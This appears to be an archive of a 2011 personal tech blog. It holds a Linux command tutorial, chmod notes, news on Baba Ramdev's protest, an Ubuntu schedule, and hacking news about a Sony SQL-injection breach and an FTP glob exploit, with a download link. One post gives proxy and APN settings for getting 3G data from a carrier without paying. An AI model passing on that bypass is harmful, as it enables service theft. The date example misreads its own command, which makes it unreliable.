If you need help understanding the command more thoroughly, or it's options, try adding --help to the end of your command. Example: Say you need help with the command "date," you would do "date --help"

Here are some basic linux commands:

cd. You use cd to change directories. Type cd followed by the name of a directory to access that directory. Keep in mind that you are always in a directory and allowed access to any directories hierarchically above or below. Example: cd games
If you directory games is not located hierarchically below the current directory, then you may use either of the following examples:
cd /usr/games
cd ../games

clear. Use clear to clear the terminal. Type clear to clean up your terminal window. This is especially helpful when you are typing lots of commands and need a clean window to help you focus. Example: clear
This is also useful when you are getting ready to type a rather long command or a command with a rather long output and do not wish to become confused or distracted by other details on the screen.

date. Use date to set your server's date and time. Type date followed by the two digit month, the two digit date, the two digit time, and two digit minutes. The syntax is easy enough and resembles this: MMDDhhmm
This command is helpful but must be used when superuser or logged in as root. Otherwise you will get an "Operation not permitted" output. As root or superuser, you can execute the command such as:
date 04231839
The above command will set the server date and time to the fourth month (April), the eighth day, at 5:39 PM.

df. Use df to check disk space. Typing df provides a very quick check of your file system disk space. Type df -h to get a more easily readable version of the output. Notice that this command will include all application storage such as your hard disk/s (hda, hdb, etc.) and your server SWAP file (shm). To list disk space including file system type, execute the following command: df -h -T
You could also combine -h -T by using df -hT

finger. Use finger to see who is on the system. Typing finger allows you to see who else is on the system or get detailed information about a person who has access to the system. Type finger followed by the name of a user's account to get information about that user. Or, type finger and press enter to see who is currently on the system and what they are currently doing. Example: finger johndoe

logout. Yep, you guessed it, typing logout will log your account out of the system. Type logout at the prompt to disconnect from your linux machine or to logout a particular user session from the system. Keep in mind that although rudimentary, leaving your critical account logged on may be a security concern. I always recommend promptly using logout when you are finished using your root account. Example: logout

ls. Use ls to list files and directories. Type ls to see a list of the files and directories located in the current directory. If you are in the directory named games and you execute ls, a list will apear that contains files in the games directory and sub-directories that are in the games directory. Examples:
ls Mail
ls /usr/bin
Type ls -alt to see a list of all files (including .rc files) and all directories located in the current directory. The listing will include detailed, and often useful information. Examples:
ls -alt
ls -alt /usr/bin
If the screen flies by and you miss seeing a number of files, try using the |more at the end like:
ls -alt |more
* In bash, (linux shell) often the abbreviated command "L" is available. To get a verbose listing of files and directories, you could therefore simply type: l

man. Use man to pull up information about a linux command. Type man followed by a command to get detailed information about how to use the command. Example: man ls
Type man -k followed by a word to list all of the commands and descriptions that contain the word you specified. Example: man -k finger

more. Use more to read the contents of a file. Type more followed by the name of a text file to read the file's contents. Why do I emphasize using this on a text file? Because most other types of files will look like garbage that you will probably not understand. Example: more testfile.txt

nano. Use nano to start a text editor. Typing nano will start a basic text editor on most linux systems. Type nano followd by the filename you wish to edit. This basic editor is quick and easy to use for beginners. However, it is very important that you also learn about other text editors available on linux and UNIX systems. I searched for a page three other text editors: vi, pico, and emacs. You may go to http://www.reallylinux.com/docs/editors/editor.shtml to learn about those.

passwd. Use passwd to change your current password. Type passwd and press enter. You will see the message "Changing password for username."
At the old password: prompt, type in your old password.
Then, at the enter new password: prompt, type in your new password.
The system double checks your new password just in case you made a typo the first time typing it. Beside the verify: prompt, type your new password again. You may also change other user's passwords with this. Just use "passwd theirusername". Although, this does require root to change other's passwords.

pwd. Use pwd to print the name of your current working directory. Type pwd and hit enter. You will see the full name of the directory you are currently in. This is your directory path and is very handy. This is especially handy when you forget what directory you have changed to and are trying to run other commands.

File Permissions on Linux

2011-08-12T17:41:00.000+05:30

First of all, let's figure out what the command "chmod" does.

chmod - The chmod command allows you to alter access rights to files and directories. All files and directories have security permissions that grant the user particular groups’ or all other users’ access. To view your files' settings, at the shell prompt type: ls -alt
You should see some files with the following in front of them (an example follows):
total 4
drwxrwsr-x 7 file1 file1 1024 Apr 6 14:30 .
drwxr-s--x 22 file2 file2 1024 Mar 30 18:20 ..
d-wx-wx-wx 3 file3 file3 1024 Apr 6 14:30 content
drwxr-xr-x 2 file4 file4 1024 Mar 25 20:43 files

What do the letters mean in front of the files/directories mean?
r indicates that it is readable (someone can view the file’s contents)
w indicates that it is writable (someone can edit the file’s contents)
x indicates that it is executable (someone can run the file, if executable)
- indicates that no permission to manipulate has been assigned.

When listing your files, the first character lets you know whether you’re looking at a file or a directory. It’s not part of the security settings. The next three characters indicate Your access restrictions. The next three indicate your group's permissions, and finally other users' permissions.

Use chmod followed by the permission you are changing. In very simple form this would be:
chmod 755 filename
The example above will grant you full rights, group rights to execute and read, and all others access to execute the file.
# Permission
7 full
6 read and write
5 read and execute
4 read only
3 write and execute
2 write only
1 execute only
0 none

Still confused? Use the table above to define the settings for the three "users." In the command, the first number refers to your permissions, the second refers to group, and the third refers to general users.

Typing the command: chmod 751 filename

gives you full access, the group read and execute, and all others execute only permission.

I hope this article helps anyone having trouble with file permissions on linux. Don't forget to rate and comment. Thanks.

Synchronise Facebook contacts Gmail

2011-06-08T19:01:00.000+05:30

The way of synchronising or merging your facebook contacts into Gmail or any other application consists of 3 steps:

1. Yahoo fetching contacts from Facebook profile.

2.Exporting contacts from yahoo to the required format file.

3.Importing your contacts from the file.

Follow the images :

Find this on the screen.

Click on Facebook in the menu.

Allow your action.

Let it process.

Finally u get this.

Contacts copied !!

Now go to:

Tools --> Export

Save the file and update your facebook contacts wherever you want.

Free Unlimited 3G Service Tata Docomo

2011-06-08T17:52:00.001+05:30

Requirements

Tata Docomo SIM Card with a balance of more than Rs. 1
3G enabled cellphone

Steps

Create New Access Point Using Below Configuration and restart your cellphone.
- Name : Tata Docomo or any
- Access Point ( APN ) – tata.docomo.dive.in
- Homepage : www.google.com or any
- Proxy : 202.87.41.147
- Proxy Port : 8080
- Username : leave blank
- Password : leave blank
Download Operamini 4.2 Handler Browser
Open your Opera mini handler and do the following changes in the Setiings:
- Set Divein Settings as Default Settings For Opera Mini
- Set http in Custom Field in your Opera Mini handler
- Set Socket Server to http://203.115.112.5.server4.operamini.com OR http://10.124.72.171.server4.operamini.com
- Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)
Done!! Now use your free unlimited 3G service. Enjoy!!

Source:Hungry-Hackers

Midnight swoop by police ends Ramdev camp

2011-06-05T08:09:00.000+05:30

Delhi Police cancelled permission for the yoga camp at Ramlila Grounds and ordered Baba Ramdev to stay out of Delhi's limits late on Saturday night. Ramdev was removed from the Ramlila Grounds and was escorted to Delhi border by Delhi Police. Police stormed the yoga guru's fast venue and removed him from the spot. Ramdev is now under police detention and there is an externment order against him. However, sources have told CNN-IBN that he has still not been taken out of New Delhi.

The permission for yoga camp was cancelled and section 144 was imposed at the Ramlila Grounds as protestors were thrown out. Police fired tear gas shells to disperse Baba's followers which included women and children. More than 30 people were injured in the police action. Towards dawn all the protestors had been removed and the pandal was dismantled.
Baba's PRO spoke to CNN-IBN right after the yoga guru was taken away by police. He said, "This is unfair. We request the Chief Justice of India to take note of this and pass an order on the Delhi police and government of India. Thousands have been injured."
The first signs of the crackdown came shortly after 1 am, with a heavy contingent of Delhi Police landing up at the Ramlila Grounds and surrounding the protest site sensing trouble. The crowds resisted and began forming rings around the stage in their bid to prevent any forcible eviction leading to scuffles.
By 1.30 am a shaken Baba Ramdev soon appeared on the stage, took the public address system and began addressing the gathering. Taking turns to exhort the crowd to stay peaceful and also protesting what he called an unfair action, he even appealed to the people of Delhi to march towards Ramlila Grounds.
The police continued to close in towards the stage in their bid to remove Baba Ramdev from the crowd of supporters who were surrounding him.
The ring of supporters around Baba Ramdev on the stage and thousands of others milling around the stage meant the police would find it tough to evict him without resistance. After a brief scuffle and some stone pelting, the police used teargas shells were used to scatter the crowd - to create an opening to ensure the yoga guru was whisked away without the crowd being able to intervene.
Just as the police were about to evict Baba Ramdev, a minor fire broke out on the stage even as crowds milled around. Luckily the flames were put out in time before any serious damage could occur.
By 2.30 am the stage had been cleared up. A posse of policemen led by the Deputy Commissioner of Central District had taken Baba Ramdev away from the stage along with his close associates. Hundreds of policemen fanned around the venue using the opportunity to clear away most of those milling around the area near the stage. The bustling Ramlila Ground had been cleared of the crowds within two hours of the police first arriving at the spot.
The post-midnight swoop by the police - the scuffles and the tough action meant several participants of the protest fast sustained injuries. In fact while Ramdev's supporters claimed hundreds had been injured, official figures put the number of injured at 30.
At 5 am, police forcibly removed the remaining protestors. Several women followers were seen being forcibly taken away by women police constables. Apart from evicting followers, police also made sure most of the pandals were removed. The police also made sure protestors didn't use the machinery available to stir another round of agitation.
Within just half an hour - by 5.30 am - the entire venue looked almost deserted, barring a few protestors who were being whisked away by police and of course security personnel. One could see personal belongings strewn all over the place and most of the tents were removed.
Almost 3000 policemen were deployed in and around Ramlila Grounds. The Rapid Action Force of CRPF were also called in to the Central District. Police said that the purpose of setting up the yoga shivir at Ramlila Maidan was to carry out yoga activities not for any agitation.
Ramdev made it clear after a flip-flop on Saturday evening that he won't end his hunger strike until he gets a written agreement from the government on recovering black money.
He got the letter from the government late on Saturday night, but, did not end his agitation.

Sony Hacked for 12th time !!

2011-06-04T10:02:00.001+05:30

Okay ! The Idahc - Lebanese hacker is back to hit Sony. This time he claim to hack the Database of Application Store at Sony Europe http://apps.pro.sony.eu/.

A new day, A new surprise for Sony ! Yesterday, Sony Pictures hacked and Database Leaked by LulzSec . Last time Sony Ericsson Got Hacked by Idahc - Lebanese hacker , Read Here.

The attack is same using SQL injection , Here the Proof :

The data extracted by hacker have 120 users data , as posted on a public text sharing site Pastebin.com .

Baba Ramdev begins fast against corruption

2011-06-04T09:00:00.001+05:30

Baba Ramdev began his hunger strike at the Ramlila Maidan in Delhi at sharp 7 am today. He describes his fast as "a satyagraha against corruption."

Thousands of his supporters have already gathered there and many more are expected to join him through the day. VHP's Sadhvi Rithambara also shared the stage with him.

Keep Rocking, Keep Hacking

Ubuntu 11:10 release

2011-05-19T20:13:00.000+05:30

The tentative release schedule for the Ubuntu 11.10 development cycle has been made available.
As with all release schedules the dates listed below are subject to change. If you’re landing on this page in July, August or even October you are advised to refer to wiki.ubuntu.com/OneiricReleaseSchedule to see the most up-to-date version.
For folks in the ‘now’ the dates bound for your diary’s/calendar apps are: -

June 2nd Alpha 1
June 30th Alpha 2
August 4th Alpha 3
September 1st Beta 1
September 22nd Beta 2
October 13th Ubuntu 11.10

A fanboy note: Oneiric will be the second release of Ubuntu to be made available on the 13th, the last being Ubuntu 5.10 Breezy Badger way back in 2005.

Ubuntu 4.10 20th October
Ubuntu 5.10 13th October
Ubuntu 6.10 26th October
Ubuntu 7.10 18th October
Ubuntu 8.10 30th October
Ubuntu 9.10 29th October
Ubuntu 10.10 10th October

Keep Rocking, Keep Hacking

0day Exploit Released : Adobe, HP, Sun, Microsoft Interix & many more Vendors FTP hackable !

2011-05-03T15:14:00.002+05:30

0day Exploit Released : Adobe, HP, Sun, Microsoft Interix & many more Vendors FTP hackable !

Topic : Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon)
CVE : CVE-2010-2632
CWE : CWE-NOMAPPING
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : Yes
Victim interaction required : No
Credit : Maksymilian Arciemowicz

Affected Software (verified):
- - OpenBSD 4.7
- - NetBSD 5.0.2
- - FreeBSD 7.3/8.1
- - Oracle Sun Solaris 10
- - GNU Libc (glibc)

Affected Ftp Servers:
- - ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban)
- - ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached" and ban)
- - ftp.freebsd.org
- - ftp.adobe.com
- - ftp.hp.com
- - ftp.sun.com
- - more more and more

Affected Vendors (not verified):
- - Apple
- - Microsoft Interix
- - HP
- - more more more

Exploit Download : http://www.exploit-db.com/exploits/15215/

Source:TheHackerNews